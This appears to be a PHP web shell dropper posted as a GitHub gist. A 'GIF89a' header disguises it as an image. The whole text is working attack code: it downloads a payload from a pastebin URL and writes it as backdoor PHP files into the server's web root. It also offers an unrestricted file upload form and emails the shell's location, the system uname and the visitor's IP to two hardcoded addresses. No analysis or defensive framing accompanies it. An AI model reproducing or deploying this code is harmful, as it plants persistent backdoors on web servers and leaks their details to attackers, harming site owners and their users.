GIF89a; | |
<?php | |
error_reporting(0); | |
function parah($url){ | |
$im = curl_init($url); | |
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); | |
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); | |
curl_setopt($im, CURLOPT_HEADER, 0); | |
return curl_exec($im); | |
curl_close($im); | |
} | |
echo '<center><br><b>h0d3_g4nT3nG'.'<br>'.'Uname:'.php_uname().'<br></b></center>'; | |
$asu =rand(); | |
$filename="dont-dell$asu.php"; | |
$fget=file_get_contents("https://pastebin.com/raw/UkW9ywcC"); | |
// WGET Backdoor | |
$path=getcwd().DIRECTORY_SEPARATOR; | |
$fileopen=fopen("$path/$filename",'w'); | |
$execfile=fwrite($fileopen,$fget); | |
if($execfile) | |
{ | |
echo "Success UP: $path$filename <br>"; | |
} | |
else { | |
echo "Failed execute newfile $filename in $path <br>"; | |
} | |
if(isset($_POST['Submit'])){ | |
$filedir = ""; | |
$maxfile = '2000000'; | |
$mode = '0644'; | |
$userfile_name = $_FILES['image']['name']; | |
$userfile_tmp = $_FILES['image']['tmp_name']; | |
if(isset($_FILES['image']['name'])) { | |
$qx = $filedir.$userfile_name; | |
@move_uploaded_file($userfile_tmp, $qx); | |
@chmod ($qx, octdec($mode)); | |
echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>"; | |
} | |
} | |
else{ | |
echo'<center><form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form></center>'; | |
} | |
$web = $_SERVER['HTTP_HOST'].""; | |
$upload = $_SERVER['DOCUMENT_ROOT']. "/jembu$asu.php"; | |
$config = parah("https://pastebin.com/raw/UkW9ywcC"); | |
$open = fopen($upload, 'w'); | |
fwrite($open, $config); | |
fclose($open); | |
if(file_exists($upload)){ | |
echo "Shell Ke Upload : http://$web/jembu$asu.php<br>" ; | |
}else { | |
echo "Gagal Upload Shell -_- <br>"; | |
} | |
$tujuanmail = 'barbarnime@gmail.com,tukangcekstil@hotmail.com'; | |
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; | |
$pesan_alert = "fix $x_path :p $path$filename \n Uname : ".php_uname()." \n Acess : http://$web/jembu$asu.php \n *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ] \n"; | |
@mail($tujuanmail, "Timthumb Bot !!", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment